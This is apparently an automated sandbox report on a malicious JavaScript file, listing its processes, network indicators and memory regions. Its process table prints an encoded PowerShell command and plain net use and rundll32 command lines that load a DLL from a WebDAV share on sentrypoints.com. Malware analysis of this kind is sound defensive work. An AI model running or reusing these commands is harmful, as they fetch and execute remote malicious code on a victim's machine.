Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
6874207812981127022.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axxc2tyz.hkh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnc0j5lo.ahg.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6874207812981127022.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADMAMQA5ADYAOAAzADIAMQA3ADIAMwAxAC4AZABsAGwALABFAG4AdAByAHkA
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\1319683217231.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://sentrypoints.com:8888/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://sentrypoints.com:8888/ce
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sentrypoints.com
|
94.159.113.48
|
|
|
|
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
|
217.20.57.34
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
sentrypoints.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2A619160000
|
heap
|
page read and write
|
||
|
23953B38000
|
heap
|
page read and write
|
||
|
2A61922E000
|
heap
|
page read and write
|
||
|
F648AFE000
|
stack
|
page read and write
|
||
|
2A6192B2000
|
heap
|
page read and write
|
||
|
2A61AF82000
|
heap
|
page read and write
|
||
|
2A61926F000
|
heap
|
page read and write
|
||
|
262D62CF000
|
heap
|
page read and write
|
||
|
2A61AF68000
|
heap
|
page read and write
|
||
|
2A61AF75000
|
heap
|
page read and write
|
||
|
1E5E54E0000
|
heap
|
page readonly
|
||
|
2A619279000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF7E000
|
heap
|
page read and write
|
||
|
2A61AF35000
|
heap
|
page read and write
|
||
|
23953B0D000
|
heap
|
page read and write
|
||
|
262D6240000
|
heap
|
page read and write
|
||
|
262D62CF000
|
heap
|
page read and write
|
||
|
262D646B000
|
heap
|
page read and write
|
||
|
F648DFC000
|
stack
|
page read and write
|
||
|
1E5E5B98000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
1E5E578F000
|
trusted library allocation
|
page read and write
|
||
|
23953CD0000
|
remote allocation
|
page read and write
|
||
|
1E5FD799000
|
heap
|
page read and write
|
||
|
2A619284000
|
heap
|
page read and write
|
||
|
B376F7E000
|
stack
|
page read and write
|
||
|
F6486FE000
|
stack
|
page read and write
|
||
|
1E5FD806000
|
heap
|
page read and write
|
||
|
1E5FDB40000
|
heap
|
page read and write
|
||
|
2A61AF76000
|
heap
|
page read and write
|
||
|
23953A80000
|
heap
|
page read and write
|
||
|
262D62E5000
|
heap
|
page read and write
|
||
|
2A619284000
|
heap
|
page read and write
|
||
|
B37743E000
|
stack
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF7A000
|
heap
|
page read and write
|
||
|
1E5E5B78000
|
trusted library allocation
|
page read and write
|
||
|
23953AFE000
|
heap
|
page read and write
|
||
|
B3770BE000
|
stack
|
page read and write
|
||
|
B376CFC000
|
stack
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF4C5D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
262D6460000
|
heap
|
page read and write
|
||
|
2A61949D000
|
heap
|
page read and write
|
||
|
2A61AF4C000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1E5E5778000
|
trusted library allocation
|
page read and write
|
||
|
23953B08000
|
heap
|
page read and write
|
||
|
23953B0D000
|
heap
|
page read and write
|
||
|
2A61AF31000
|
heap
|
page read and write
|
||
|
2A61AF32000
|
heap
|
page read and write
|
||
|
B376D7E000
|
stack
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
2A619284000
|
heap
|
page read and write
|
||
|
2A61AF6A000
|
heap
|
page read and write
|
||
|
1E5E56BD000
|
trusted library allocation
|
page read and write
|
||
|
1E5FD829000
|
heap
|
page read and write
|
||
|
1E5E5130000
|
heap
|
page read and write
|
||
|
1E5E38A5000
|
heap
|
page read and write
|
||
|
23953B26000
|
heap
|
page read and write
|
||
|
2A61AF60000
|
heap
|
page read and write
|
||
|
23953A90000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF37000
|
heap
|
page read and write
|
||
|
23953AD0000
|
heap
|
page read and write
|
||
|
1E5E3B10000
|
heap
|
page read and write
|
||
|
2A61AF75000
|
heap
|
page read and write
|
||
|
2A61AF3B000
|
heap
|
page read and write
|
||
|
1E5E5A2A000
|
trusted library allocation
|
page read and write
|
||
|
1E5E54F0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E5E5775000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
1E5E56DA000
|
trusted library allocation
|
page read and write
|
||
|
848C0BA000
|
stack
|
page read and write
|
||
|
1E5E387D000
|
heap
|
page read and write
|
||
|
2A61AF37000
|
heap
|
page read and write
|
||
|
262D62CB000
|
heap
|
page read and write
|
||
|
262D62B0000
|
heap
|
page read and write
|
||
|
1E5F56E1000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
2A619264000
|
heap
|
page read and write
|
||
|
1E5E5180000
|
trusted library allocation
|
page read and write
|
||
|
2A61949D000
|
heap
|
page read and write
|
||
|
2A61AF3F000
|
heap
|
page read and write
|
||
|
23953CD0000
|
remote allocation
|
page read and write
|
||
|
1E5FD910000
|
heap
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
23953CE5000
|
heap
|
page read and write
|
||
|
F6488FE000
|
stack
|
page read and write
|
||
|
2A61AF40000
|
heap
|
page read and write
|
||
|
B37723C000
|
stack
|
page read and write
|
||
|
1E5E5530000
|
heap
|
page read and write
|
||
|
1E5E5160000
|
trusted library allocation
|
page read and write
|
||
|
1E5E5BAA000
|
trusted library allocation
|
page read and write
|
||
|
2A619200000
|
heap
|
page read and write
|
||
|
1E5E5B42000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
1E5E56D0000
|
trusted library allocation
|
page read and write
|
||
|
1E5E568B000
|
trusted library allocation
|
page read and write
|
||
|
2A61924F000
|
heap
|
page read and write
|
||
|
2A619260000
|
heap
|
page read and write
|
||
|
2A61B3CD000
|
heap
|
page read and write
|
||
|
2A61AF48000
|
heap
|
page read and write
|
||
|
262D7D50000
|
heap
|
page read and write
|
||
|
1E5E5660000
|
heap
|
page execute and read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
262D6220000
|
heap
|
page read and write
|
||
|
B376E7C000
|
stack
|
page read and write
|
||
|
B3771BB000
|
stack
|
page read and write
|
||
|
262D62D0000
|
heap
|
page read and write
|
||
|
262D62F0000
|
heap
|
page read and write
|
||
|
2A61AF62000
|
heap
|
page read and write
|
||
|
2A61923E000
|
heap
|
page read and write
|
||
|
2A61926E000
|
heap
|
page read and write
|
||
|
2A61AF46000
|
heap
|
page read and write
|
||
|
23953B06000
|
heap
|
page read and write
|
||
|
B377079000
|
stack
|
page read and write
|
||
|
2A61949B000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
2A619257000
|
heap
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
B377137000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
2A61925A000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1E5E5789000
|
trusted library allocation
|
page read and write
|
||
|
2A61AAF0000
|
heap
|
page read and write
|
||
|
F6487FF000
|
stack
|
page read and write
|
||
|
1E5E5B40000
|
trusted library allocation
|
page read and write
|
||
|
262D62D4000
|
heap
|
page read and write
|
||
|
2A61B55A000
|
heap
|
page read and write
|
||
|
262D6140000
|
heap
|
page read and write
|
||
|
848C13E000
|
stack
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
262D62DB000
|
heap
|
page read and write
|
||
|
2A619080000
|
heap
|
page read and write
|
||
|
F6484FD000
|
stack
|
page read and write
|
||
|
2A61922F000
|
heap
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
2A619268000
|
heap
|
page read and write
|
||
|
2A61AF30000
|
heap
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
2A61AF55000
|
heap
|
page read and write
|
||
|
1E5E5B1A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
848C1BE000
|
stack
|
page read and write
|
||
|
2A61AF75000
|
heap
|
page read and write
|
||
|
1E5E5195000
|
heap
|
page read and write
|
||
|
262D62F8000
|
heap
|
page read and write
|
||
|
23953AFE000
|
heap
|
page read and write
|
||
|
2A619278000
|
heap
|
page read and write
|
||
|
262D63D0000
|
heap
|
page read and write
|
||
|
262D9650000
|
heap
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
23953CD0000
|
remote allocation
|
page read and write
|
||
|
8AD807A000
|
stack
|
page read and write
|
||
|
2A61924F000
|
heap
|
page read and write
|
||
|
1E5FD83D000
|
heap
|
page read and write
|
||
|
1E5E385D000
|
heap
|
page read and write
|
||
|
1E5FD780000
|
heap
|
page read and write
|
||
|
2A61B3C8000
|
heap
|
page read and write
|
||
|
1E5E5671000
|
trusted library allocation
|
page read and write
|
||
|
1E5E578D000
|
trusted library allocation
|
page read and write
|
||
|
1E5FD859000
|
heap
|
page read and write
|
||
|
2A6192B3000
|
heap
|
page read and write
|
||
|
2A619207000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
F6482F4000
|
stack
|
page read and write
|
||
|
B376DFF000
|
stack
|
page read and write
|
||
|
23953AFB000
|
heap
|
page read and write
|
||
|
262D6465000
|
heap
|
page read and write
|
||
|
2A61AF7B000
|
heap
|
page read and write
|
||
|
1E5F5680000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
2A619495000
|
heap
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
2A61AF46000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1E5FD7BE000
|
heap
|
page read and write
|
||
|
2A61AF32000
|
heap
|
page read and write
|
||
|
B376C73000
|
stack
|
page read and write
|
||
|
848C47D000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
23953B45000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
B3772BF000
|
stack
|
page read and write
|
||
|
1E5E5704000
|
trusted library allocation
|
page read and write
|
||
|
1E5E3B15000
|
heap
|
page read and write
|
||
|
8AD80FE000
|
stack
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF43000
|
heap
|
page read and write
|
||
|
2A61BB63000
|
heap
|
page read and write
|
||
|
2A61AF48000
|
heap
|
page read and write
|
||
|
2A61AF58000
|
heap
|
page read and write
|
||
|
1E5FD9F0000
|
heap
|
page execute and read and write
|
||
|
2A61AF54000
|
heap
|
page read and write
|
||
|
848C57F000
|
stack
|
page read and write
|
||
|
2A61B86F000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
2A619284000
|
heap
|
page read and write
|
||
|
23953AB0000
|
heap
|
page read and write
|
||
|
23953B2C000
|
heap
|
page read and write
|
||
|
2A61AF5E000
|
heap
|
page read and write
|
||
|
2A61926B000
|
heap
|
page read and write
|
||
|
262D62DF000
|
heap
|
page read and write
|
||
|
2A61AF7F000
|
heap
|
page read and write
|
||
|
2A61AF6B000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF7E000
|
heap
|
page read and write
|
||
|
1E5FD7DC000
|
heap
|
page read and write
|
||
|
262D62B8000
|
heap
|
page read and write
|
||
|
2A61949D000
|
heap
|
page read and write
|
||
|
1E5E54F7000
|
heap
|
page execute and read and write
|
||
|
2A619180000
|
heap
|
page read and write
|
||
|
1E5E57CF000
|
trusted library allocation
|
page read and write
|
||
|
23953AD8000
|
heap
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1E5E5500000
|
trusted library allocation
|
page read and write
|
||
|
B37733E000
|
stack
|
page read and write
|
||
|
1E5F5671000
|
trusted library allocation
|
page read and write
|
||
|
2A61AF75000
|
heap
|
page read and write
|
||
|
2A619284000
|
heap
|
page read and write
|
||
|
F6483FE000
|
stack
|
page read and write
|
||
|
2A61AF46000
|
heap
|
page read and write
|
||
|
262D9AA0000
|
trusted library allocation
|
page read and write
|
||
|
B3774BB000
|
stack
|
page read and write
|
||
|
262D62C7000
|
heap
|
page read and write
|
||
|
23953CE0000
|
heap
|
page read and write
|
||
|
2A61B6D8000
|
heap
|
page read and write
|
||
|
2A619490000
|
heap
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
1E5E3820000
|
heap
|
page read and write
|
||
|
1E5E577B000
|
trusted library allocation
|
page read and write
|
||
|
23953B2E000
|
heap
|
page read and write
|
||
|
23953AFF000
|
heap
|
page read and write
|
||
|
B376FFE000
|
stack
|
page read and write
|
||
|
2A61AF4C000
|
heap
|
page read and write
|
||
|
1E5E3918000
|
heap
|
page read and write
|
||
|
1E5E5190000
|
heap
|
page read and write
|
||
|
1E5E3865000
|
heap
|
page read and write
|
||
|
1E5E3920000
|
heap
|
page read and write
|
||
|
23953B38000
|
heap
|
page read and write
|
||
|
23953B26000
|
heap
|
page read and write
|
||
|
2A61AF46000
|
heap
|
page read and write
|
||
|
1E5E57C8000
|
trusted library allocation
|
page read and write
|
||
|
1E5E3869000
|
heap
|
page read and write
|
||
|
2A61AF3C000
|
heap
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E5FD86B000
|
heap
|
page read and write
|
||
|
1E5E3832000
|
heap
|
page read and write
|
||
|
2A61AF7F000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
262D9653000
|
heap
|
page read and write
|
||
|
2A61AF46000
|
heap
|
page read and write
|
||
|
8AD817E000
|
stack
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
848C4FB000
|
stack
|
page read and write
|
||
|
B376EFE000
|
stack
|
page read and write
|
||
|
2A61B0BC000
|
heap
|
page read and write
|
||
|
F648BFD000
|
stack
|
page read and write
|
||
|
F6489FF000
|
stack
|
page read and write
|
||
|
262D62CF000
|
heap
|
page read and write
|
||
|
2A61AF50000
|
heap
|
page read and write
|
||
|
1E5E3730000
|
heap
|
page read and write
|
||
|
2A61949B000
|
heap
|
page read and write
|
||
|
2A61AF59000
|
heap
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A61AF46000
|
heap
|
page read and write
|
||
|
1E5E3940000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E5E38AB000
|
heap
|
page read and write
|
||
|
1E5FD847000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A61AF44000
|
heap
|
page read and write
|
||
|
1E5FD7C0000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1E5E3907000
|
heap
|
page read and write
|
||
|
2A61923F000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
262D62CB000
|
heap
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A61AF75000
|
heap
|
page read and write
|
There are 283 hidden memdumps, click here to show them.